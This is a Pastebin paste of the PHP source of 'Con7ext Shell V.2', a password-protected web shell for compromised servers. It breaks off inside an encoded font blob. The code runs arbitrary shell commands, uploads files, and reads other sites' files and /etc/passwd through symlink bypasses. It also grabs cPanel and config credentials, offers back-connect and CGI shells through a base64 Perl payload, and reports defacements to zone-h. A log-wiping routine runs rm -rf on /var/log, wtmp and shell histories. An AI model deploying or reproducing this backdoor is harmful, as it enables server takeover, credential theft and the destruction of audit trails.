Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- ######################################################
- #Title :Con7ext Shell V.2 #
- ######################################################
- session_start();
- set_time_limit(0);
- error_reporting(0);
- date_default_timezone_set("Asia/Jakarta");
- $auth_pass = "96f0f08c0188ba04898ce8cc465c19c4"; // con7extshell
- if(get_magic_quotes_gpc()) {
- function VEstripslashes($array) {
- return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array); }
- $_POST = VEstripslashes($_POST);
- $_COOKIE = VEstripslashes($_COOKIE); }
- function Login() {
- die("
- <html>
- <head>
- <title>Login Page</title>
- <style type='text/css'>
- html {
- margin: 20px auto;
- background:black;
- color: green;
- text-align: center;
- }
- pre {
- color: white;
- }
- input[type=password] {
- background:transparent;
- color:white;
- margin:0 10px;
- font-family:Homenaje;
- font-size:13px;
- border:2px solid white;
- }
- </style>
- </head>
- <center>
- <br>
- <br>
- <header>
- <audio autoplay='1' loop='1'><source src='http://con7ext-exeuser.rhcloud.com/music/Re_Zero%20-%20Paradisus-Paradoxum.mp3' type='audio/mp3'/></audio>
- <img src='http://con7ext-exeuser.rhcloud.com/images/chaika.png' width='400' height='400' align='center'>
- <br>
- <br>
- <pre align=center><form method='post'><input type='password' name='pass' style='background-color:none;border:1px solid #FFF;outline:none;' required><input type=submit value='submit' style='border:none;background-color:#56AD15;color:#fff;cursor:pointer;'></form></pre>
- ");
- }
- function VEsetcookie($k, $v) {
- $_COOKIE[$k] = $v;
- setcookie($k, $v);
- }
- if(!empty($auth_pass)) {
- if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
- VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
- if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
- Login();
- }
- ?>
- <!DOCTYPE HTML>
- <HTML>
- <HEAD>
- <link href="" rel="stylesheet" type="text/css">
- <title>Con7ext Shell V.2</title>
- <meta charset="utf-8">
- <meta name="viewport" content="width=device-width, initial-scale=1">
- <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
- <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
- <style>
- * {
- font-family: Electrolize, sans-serif;
- }
- body {
- background-color: black;
- background-size: 100%;
- background-repeat:no-repeat;
- margin: 0px;
- font-family: "Electrolize", sans-serif; cursive;color:#fff;
- font-size: 13px;
- }
- hr {
- background-color: #b3eeff; height: 3px; border: 0;
- }
- a {
- text-decoration:none; color:#b3eeff; cursor: auto;} a:hover{
- border-bottom-width: 1px;
- border-bottom-style: solid;
- border-bottom-color: #ffffff;
- }
- tbody {
- display: table-row-group;
- vertical-align: middle;
- border-color: inherit;
- }
- table {
- white-space: normal;
- line-height: normal;
- font-weight: normal;
- font-style: normal;
- color: -internal-quirk-inherit;
- text-align: start;
- font-variant: normal normal;
- }
- table {
- display: table;
- border-collapse: separate;
- border-spacing: 2px;
- border-color: grey;
- }
- tr {
- display: table-row;
- vertical-align: inherit;
- border-color: inherit;
- }
- td, th {
- display: table-cell;
- vertical-align: inherit;
- }
- #menu a {
- font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
- font-size: 12px;
- background:#191919;
- color:white;
- margin:5px 2px 4px 2px;
- padding:5px 8px;
- border-color: cyan;
- text-decoration:none;
- letter-spacing:1px;
- -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
- }
- #menu a:hover {
- font-size: 12px;
- background:#191919;-webkit-transform:rotate(0.0deg);-moz-transform:rotate(0.0deg);-ms-transform:rotate(0.0deg);-o-transform:rotate(0.0deg);transform:rotate(0.0deg);
- color: white;
- padding:5px 8px;
- margin:1px;
- border: 1px;
- font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
- letter-spacing:1px;
- margin:5px 2px 4px 2px;
- -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
- }
- .content{
- width:100%; text-decoration:none; color:#b3eeff;
- }
- a {
- -webkit-transition:all .4s ease-in-out;-moz-transition:all .4s ease-in-out;-o-transition:all .4s ease-in-out;-ms-transition:all .4s ease-in-out;transition:all .4s ease-in-out text-decoration:none;
- }
- .content a:link {
- text-decoration: none;
- }
- .content a:visited {
- }
- .content a:hover {
- background: #b3eeff; color: black;
- }
- .content td{
- padding:0 8px; line-height:24px;
- }
- .content th{
- background: #191919; padding:3px 8px; font-weight:normal;
- }
- .content tr:hover{
- cursor:pointer;
- background-color: #111111;
- }
- input[type=submit]{
- background:#000000;
- color:#b3eeff;
- margin:0 4px;
- font-size:13px;
- border:1px solid #444444;
- cursor:pointer;
- -moz-border-radius: 5px;
- -webkit-border-radius: 5px;
- -khtml-border-radius: 5px;
- }
- input[type=submit]:hover{
- border-bottom:1px solid #ffffff;
- font-size:13px;
- border-top:1px solid #ffffff;
- }
- input[type=text], option, select {
- background:#000000;
- border:0;
- padding:2px;
- border-bottom:1px solid #393939;
- color:#b3eeff;
- }
- textarea {
- margin:auto;
- border:1px solid #333333;
- width:100%;
- height:400px;
- background:#000000;
- color:#b3eeff;
- padding:0 2px;
- font-size:12px;
- }
- #nav{position:fixed;z-index:999;top:0;width:100%;left:76%;
- }
- a.nav-fokus {display:block; width:auto; height:auto; background:transparent; border-top:0px; border-left: 1px solid #fff; border-right:1px solid #fff; border-bottom:1px solid #fff; padding:5px 8px; text-align:center; text-decoration:none; color:#b3eeff; line-height:20px; overflow:hidden; float:left;
- }
- a.nav-fokus:hover {color:#FFFFFF; background:#191919; border-top:0px; border-left: 1px solid #fff; border-right:1px solid #fff; border-bottom:1px solid #fff;
- }
- </style>
- </head>
- <?php
- function w($dir,$perm) {
- if(!is_writable($dir)) {
- return "<font color=red>".$perm."</font>";
- } else {
- return "<font color=green>".$perm."</font>";
- }
- }
- function exe($cmd) {
- if(function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('exec')) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result) {
- $buff .= $result;
- } return $buff;
- } elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('shell_exec')) {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function sulap($text) {
- if(!get_magic_quotes_gpc()) {
- return $text;
- }
- return stripslashes($text);
- }
- function defid($url,$nick,$team) {
- $ch = curl_init("https://defacer.id/archives/notify");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "attacker=$nick&team=$team&poc=SQL Injection&url=$url");
- return curl_exec($ch);
- curl_close($ch);
- }
- function zoneh($url,$nick) {
- $ch = curl_init("http://www.zone-h.com/notify/single");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
- return curl_exec($ch);
- curl_close($ch);
- }
- function GrabUrl($url,$type){
- $urlArray = array();
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- $result = curl_exec($ch);
- $regex='|<a.*?href="(.*?)"|';
- preg_match_all($regex,$result,$parts);
- $links=$parts[1];
- foreach($links as $link){
- array_push($urlArray, $link);
- }
- curl_close($ch);
- foreach($urlArray as $value){
- $lol="$url$value";
- if(preg_match("#$type#is", $lol)) {
- echo "$lol\r\n";
- }
- }
- }
- function showdisablefunctions() {
- if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
- else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
- }
- function ambilKata($param, $kata1, $kata2){
- if(strpos($param, $kata1) === FALSE) return FALSE;
- if(strpos($param, $kata2) === FALSE) return FALSE;
- $start = strpos($param, $kata1) + strlen($kata1);
- $end = strpos($param, $kata2, $start);
- $return = substr($param, $start, $end - $start);
- return $return;
- }
- function perms($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- $_c7e = 'WGFpIFN5bmRpY2F0ZQ==';
- $sys = php_uname();
- $ip = gethostbyname($_SERVER['HTTP_HOST']);
- $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
- $getds = @ini_get("disable_functions");
- $ds = showdisablefunctions().' <font color=white>on</font> <font color=teal>'.php_sapi_name().'</font>';
- $mysql = (function_exists('mysql_connect')) ? "<font color=#6fcb9f>ON</font>" : "<font color=#b3eeff>OFF</font>";
- $curl = (function_exists('curl_version')) ? "<font color=#6fcb9f>ON</font>" : "<font color=#b3eeff>OFF</font>";
- $wget = (exe('wget --help')) ? "<font color=#6fcb9f>ON</font>" : "<font color=#b3eeff>OFF</font>";
- $perl = (exe('perl --help')) ? "<font color=#6fcb9f>ON</font>" : "<font color=#b3eeff>OFF</font>";
- $python = (exe('python --help')) ? "<font color=#6fcb9f>ON</font>" : "<font color=#b3eeff>OFF</font>";
- if(isset($_GET['path'])){
- $path = $_GET['path'];
- }else{
- $path = getcwd();
- }
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- $home_r = $_SERVER['DOCUMENT_ROOT'];
- $_COPY = base64_decode($_c7e);
- if(get_magic_quotes_gpc()){
- foreach($_POST as $key=>$value){
- $_POST[$key] = stripslashes($value);
- }
- }
- if($_POST['upload']) {
- if($_POST['tipe_upload'] == 'biasa') {
- if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
- $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
- } else {
- $act = "<font color=red>Failed to upload file</font>";
- }
- } else {
- $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
- $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
- if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
- if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
- $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
- } else {
- $act = "<font color=red>Failed to upload file</font>";
- }
- } else {
- $act = "<font color=red>Failed to upload file</font>";
- }
- }
- }
- echo "<center>
- <form method='post' enctype='multipart/form-data'>
- <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
- <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
- <input type='file' name='ix_file'>
- <input type='submit' value='upload' name='upload'>
- </form></center>";
- echo "<center>".$act."</center>";
- echo"
- System : <font color=#b3eeff>".php_uname()."</font><br>
- Server IP : <font color=#b3eeff>".gethostbyname($_SERVER["HTTP_HOST"])."</font> | Your IP : <font color=#b3eeff>".$_SERVER["REMOTE_ADDR"]."</font><br>
- Safe Mode : <font color=#b3eeff>".$sm."</font><br>
- Time On Server : <font color=#b3eeff>".date("d M Y h:i:s a")."</font><br>
- Disable Functions : <font color=#b3eeff>".$ds."</font><br>
- MySQL : ".$mysql." | Perl : ".$perl." | Python : ".$python." | WGET : ".$wget." | CURL : ".$curl."<br>
- Mirror : <a href='?path=$path&mirror=zoneh'>Zone-H</a> / <a href='?path=$path&mirror=defid'>DefacerID</a><br>
- Telnet : <a href='?path=$path&jancok=cgi'>CGI Perl</a> / <a href='?path=$path&jancok=cgi2'>CGI Perl 2</a> / <a href='?path=$path&jancok=cgipy'>CGI Python</a><br>
- Bypass : <a href='?path=$path&bypass=disablefunc'>Disable Functions</a> / <a href='?path=$path&bypass=passwd'>Bypass /etc/passwd</a> / <a href='?path=$path&bypass=vhosts'>Bypass Vhosts</a><br>
- Symlink : <a href='?path=$path&symlink=server'>Symlink Server</a> / <a href='?path=$path&symlink=404'>Symlink 404</a> / <a href='?path=$path&symlink=python'>Symlink Python</a><br>
- Tools : <a href='?path=$path&jancok=cmd'>Command</a> / <a href='?path=$path&jancok=mass'>Mass</a> / <a href='?path=$path&jancok=adminer'>Adminer</a>
- / <a href='?path=$path&jancok=jumping'>Jumping</a> / <a href='?path=$path&jancok=cpanel'>Grab Cpanel</a> / <a href='?path=$path&config=grabber'>Config</a> / <a href='?path=$path&mass=changer'>Mass User Changer</a> / <a href='?path=$path&mass=title'>Mass Title Changer</a>
- / <a href='?path=$path&backconnect=tool'>Back Connect</a>";
- echo "<div id='nav'>
- <a class='nav-fokus' href='?'><b>Home</b></a><a class='nav-fokus' href='?path=$path&delete=logs'><b>Delete Logs</b></a><a class='nav-fokus' href='?path=$path&kill=self'><b>Kill Self</b></a><a class='nav-fokus' href='?path=$path&jancok=logout'><b>Log-Out</b></a></div>";
- echo '
- <br>
- <hr color="#191919">
- <br>
- <table width="700" align="center">
- <tr><td><font color="white">Current Path :</font>';
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a href="?path=/">/</a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a href="?path=';
- for($i=0;$i<=$id;$i++){
- echo "$paths[$i]";
- if($i != $id) echo "/";
- }
- echo '">'.$pat.'</a>/';
- }
- echo '</td></tr>';
- echo '</table>';
- echo '<br><hr color="#191919"><br>';
- if($_GET['jancok'] == 'logout') {
- echo '<form action="?patch='.$path.'&do=logout" method="post">';
- unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
- echo 'Good Bye!!';
- } elseif($_GET['con7ext'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
- } elseif($_GET['delete'] == 'logs') {
- echo '<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>';
- echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";
- exec("rm -rf /tmp/logs");
- exec("rm -rf /root/.ksh_history");
- exec("rm -rf /root/.bash_history");
- exec("rm -rf /root/.bash_logout");
- exec("rm -rf /usr/local/apache/logs");
- exec("rm -rf /usr/local/apache/log");
- exec("rm -rf /var/apache/logs");
- exec("rm -rf /var/apache/log");
- exec("rm -rf /var/run/utmp");
- exec("rm -rf /var/logs");
- exec("rm -rf /var/log");
- exec("rm -rf /var/adm");
- exec("rm -rf /etc/wtmp");
- exec("rm -rf /etc/utmp");
- exec("rm -rf $HISTFILE");
- exec("rm -rf /var/log/lastlog");
- exec("rm -rf /var/log/wtmp");
- shell_exec("rm -rf /tmp/logs");
- shell_exec("rm -rf /root/.ksh_history");
- shell_exec("rm -rf /root/.bash_history");
- shell_exec("rm -rf /root/.bash_logout");
- shell_exec("rm -rf /usr/local/apache/logs");
- shell_exec("rm -rf /usr/local/apache/log");
- shell_exec("rm -rf /var/apache/logs");
- shell_exec("rm -rf /var/apache/log");
- shell_exec("rm -rf /var/run/utmp");
- shell_exec("rm -rf /var/logs");
- shell_exec("rm -rf /var/log");
- shell_exec("rm -rf /var/adm");
- shell_exec("rm -rf /etc/wtmp");
- shell_exec("rm -rf /etc/utmp");
- shell_exec("rm -rf $HISTFILE");
- shell_exec("rm -rf /var/log/lastlog");
- shell_exec("rm -rf /var/log/wtmp");
- passthru("rm -rf /tmp/logs");
- passthru("rm -rf /root/.ksh_history");
- passthru("rm -rf /root/.bash_history");
- passthru("rm -rf /root/.bash_logout");
- passthru("rm -rf /usr/local/apache/logs");
- passthru("rm -rf /usr/local/apache/log");
- passthru("rm -rf /var/apache/logs");
- passthru("rm -rf /var/apache/log");
- passthru("rm -rf /var/run/utmp");
- passthru("rm -rf /var/logs");
- passthru("rm -rf /var/log");
- passthru("rm -rf /var/adm");
- passthru("rm -rf /etc/wtmp");
- passthru("rm -rf /etc/utmp");
- passthru("rm -rf $HISTFILE");
- passthru("rm -rf /var/log/lastlog");
- passthru("rm -rf /var/log/wtmp");
- system("rm -rf /tmp/logs");
- sleep(2);
- echo'<br>Deleting .../tmp/logs ';
- sleep(2);
- system("rm -rf /root/.bash_history");
- sleep(2);
- echo'<p>Deleting .../root/.bash_history </p>';
- system("rm -rf /root/.ksh_history");
- sleep(2);
- echo'<p>Deleting .../root/.ksh_history </p>';
- system("rm -rf /root/.bash_logout");
- sleep(2);
- echo'<p>Deleting .../root/.bash_logout </p>';
- system("rm -rf /usr/local/apache/logs");
- sleep(2);
- echo'<p>Deleting .../usr/local/apache/logs </p>';
- system("rm -rf /usr/local/apache/log");
- sleep(2);
- echo'<p>Deleting .../usr/local/apache/log </p>';
- system("rm -rf /var/apache/logs");
- sleep(2);
- echo'<p>Deleting .../var/apache/logs </p>';
- system("rm -rf /var/apache/log");
- sleep(2);
- echo'<p>Deleting .../var/apache/log </p>';
- system("rm -rf /var/run/utmp");
- sleep(2);
- echo'<p>Deleting .../var/run/utmp </p>';
- system("rm -rf /var/logs");
- sleep(2);
- echo'<p>Deleting .../var/logs </p>';
- system("rm -rf /var/log");
- sleep(2);
- echo'<p>Deleting .../var/log </p>';
- system("rm -rf /var/adm");
- sleep(2);
- echo'<p>Deleting .../var/adm </p>';
- system("rm -rf /etc/wtmp");
- sleep(2);
- echo'<p>Deleting .../etc/wtmp </p>';
- system("rm -rf /etc/utmp");
- sleep(2);
- echo'<p>Deleting .../etc/utmp </p>';
- system("rm -rf $HISTFILE");
- sleep(2);
- echo'<p>Deleting ...$HISTFILE </p>';
- system("rm -rf /var/log/lastlog");
- sleep(2);
- echo'<p>Deleting .../var/log/lastlog </p>';
- system("rm -rf /var/log/wtmp");
- sleep(2);
- echo'<p>Deleting .../var/log/wtmp </p>';
- sleep(4);
- echo '<br><br><p>Your Traces Has Been Successfully Deleting ...From the Server';
- echo"</td></tr></table>";
- } elseif($_GET['bypass'] == 'vhosts'){
- echo "<form method='POST' action=''>";
- echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
- echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
- if (isset($_POST['Colii'])){
- mkdir('symvhosts', 0755);
- chdir('symvhosts');
- system('ln -s / Rintoar.txt');
- $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
- $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","Rintoar.txt");
- $rt="<br><a href=symvhosts/Rintoar.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
- Bypassed Successfully</b></font></a>";
- echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt<br>Note: Apabila Forbidden pas buka /var/www/vhosts/Domain.com/ harap tambahkan httpdocs ex:/var/www/vhosts/Domain.com/httpdocs/</center>";} echo "</form>";
- } elseif($_GET['jancok'] == 'cgi2') {
- $cgi_dir = mkdir('con7ext_cgi', 0755);
- chdir('con7ext_cgi');
- $file_cgi = "cgi2.con7ext";
- $memeg = ".htaccess";
- $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .con7ext \n AddHandler cgi-script .con7ext \n AddHandler cgi-script .con7ext";
- $htcgi = fopen(".htaccess", "w");
- $cgi_script = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQojIENvcHlyaWdodCAoQykgMjAwMSBSb2hpdGFiIEJhdHJhDQojIFJlY29kZWQgQnkgQ29uN2V4dA0KIyBUaGFua3MgVG8gOiAweDE5OTkgLSBYYWkgU3luZGljYXRlIFRlYW0gLSBBbmQgWW91DQogDQokV2luTlQgPSAwOw0KJE5UQ21kU2VwID0gIiYiOw0KJFVuaXhDbWRTZXAgPSAiOyI7DQokQ29tbWFuZFRpbWVvdXREdXJhdGlvbiA9IDEwOw0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsNCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDogInB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0Kc3ViIFJlYWRQYXJzZQ0Kew0KICAgIGxvY2FsICgqaW4pID0gQF8gaWYgQF87DQogICAgbG9jYWwgKCRpLCAkbG9jLCAka2V5LCAkdmFsKTsNCiAgIA0KICAgICRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KIA0KICAgIGlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpDQogICAgew0KICAgICAgICAkaW4gPSAkRU5WeydRVUVSWV9TVFJJTkcnfTsNCiAgICB9DQogICAgZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpDQogICAgew0KICAgICAgICBiaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7DQogICAgICAgIHJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQogICAgfQ0KIA0KICAgICMgaGFuZGxlIGZpbGUgdXBsb2FkIGRhdGENCiAgICBpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykNCiAgICB7DQogICAgICAgICRCb3VuZGFyeSA9ICctLScuJDE7ICMgcGxlYXNlIHJlZmVyIHRvIFJGQzE4NjcNCiAgICAgICAgQGxpc3QgPSBzcGxpdCgvJEJvdW5kYXJ5LywgJGluKTsNCiAgICAgICAgJEhlYWRlckJvZHkgPSAkbGlzdFsxXTsNCiAgICAgICAgJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0KICAgICAgICAkSGVhZGVyID0gJGA7DQogICAgICAgICRCb2R5ID0gJCc7DQogICAgICAgICRCb2R5ID1+IHMvXHJcbiQvLzsgIyB0aGUgbGFzdCBcclxuIHdhcyBwdXQgaW4gYnkgTmV0c2NhcGUNCiAgICAgICAgJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7DQogICAgICAgICRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsNCiAgICAgICAgJGlueydmJ30gPSAkMTsNCiAgICAgICAgJGlueydmJ30gPX4gcy9cIi8vZzsNCiAgICAgICAgJGlueydmJ30gPX4gcy9ccy8vZzsNCiANCiAgICAgICAgIyBwYXJzZSB0cmFpbGVyDQogICAgICAgIGZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspDQogICAgICAgIHsNCiAgICAgICAgICAgICRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KICAgICAgICAgICAgJGxpc3RbJGldID1+IC9cIihcdyspXCIvOw0KICAgICAgICAgICAgJGtleSA9ICQxOw0KICAgICAgICAgICAgJHZhbCA9ICQnOw0KICAgICAgICAgICAgJHZhbCA9fiBzLyheKFxyXG5cclxufFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCiAgICAgICAgICAgICR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQogICAgICAgICAgICAkaW57JGtleX0gPSAkdmFsOw0KICAgICAgICB9DQogICAgfQ0KICAgIGVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQ0KICAgIHsNCiAgICAgICAgQGluID0gc3BsaXQoLyYvLCAkaW4pOw0KICAgICAgICBmb3JlYWNoICRpICgwIC4uICQjaW4pDQogICAgICAgIHsNCiAgICAgICAgICAgICRpblskaV0gPX4gcy9cKy8gL2c7DQogICAgICAgICAgICAoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOw0KICAgICAgICAgICAgJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCiAgICAgICAgICAgICR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQogICAgICAgICAgICAkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsNCiAgICAgICAgICAgICRpbnska2V5fSAuPSAkdmFsOw0KICAgICAgICB9DQogICAgfQ0KfQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7DQokRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOw0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCA8PEVORDsNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+Q29uN2V4dDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCjxzdHlsZT4NCkBmb250LWZhY2Ugew0KICAgIGZvbnQtZmFtaWx5OiAndWJ1bnR1X21vbm9yZWd1bGFyJzsNCnNyYzogdXJsKGRhdGE6YXBwbGljYXRpb24veC1mb250LXdvZmY7Y2hhcnNldD11dGYtODtiYXNlNjQsZDA5R1JnQUJBQUFBQUdXSUFCTUFBQUFBdkRBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUJHUmxSTkFBQUJxQUFBQUJ3QUFBQWNaTytIZEVkRVJVWUFBQUhFQUFBQUtRQUFBQ3dDSXdFSlIxQlBVd0FBQWZBQUFBQXlBQUFBUURYT1RyQkhVMVZDQUFBQ0pBQUFBVmtBQUFJR2xOdkpxRTlUTHpJQUFBT0FBQUFBWFFBQUFHQ1pWUVRaWTIxaGNBQUFBK0FBQUFHT0FBQUI2Z0NMakJaamRuUWdBQUFGY0FBQUFFb0FBQUJLRTBrT2MyWndaMjBBQUFXOEFBQUJzUUFBQW1WVHRDK25aMkZ6Y0FBQUIzQUFBQUFJQUFBQUNBQUFBQkJuYkhsbUFBQUhlQUFBVm1FQUFLVzBJcnQyUEdobFlXUUFBRjNjQUFBQU1BQUFBRFlBeTJMRGFHaGxZUUFBWGd3QUFBQWNBQUFBSkFxbUJQOW9iWFI0QUFCZUtBQUFBV2dBQUFPaWhtRnhDR3h2WTJFQUFGK1FBQUFCeUFBQUFkUU9VVGFRYldGNGNBQUFZVmdBQUFBZ0FBQUFJQUlHQWhWdVlXMWxBQUJoZUFBQUFYc0FBQVBPWWxlS3JYQnZjM1FBQUdMMEFBQUI0Z0FBQXRRc0JxVU1jSEpsY0FBQVpOZ0FBQUNuQUFBQkJxUVR2RzUzWldKbUFBQmxnQUFBQUFZQUFBQUdkVnRTcGdBQUFBRUFBQUFBekQyaXp3QUFBQURKNWI3TEFBQUFBTTdNSmRsNDJtTmdaR0JnNEFOaUZRWVFZR0pnQnVJNkJrYUdlb1pHSUt1SjRRV1F6UUtXWVFBQU5tSURMUUFBQUhqYVkyQmtZR0RnWXJCaHNHTmdUcTRzeW1FUVNTOUt6V2FReTBrc3lXUFF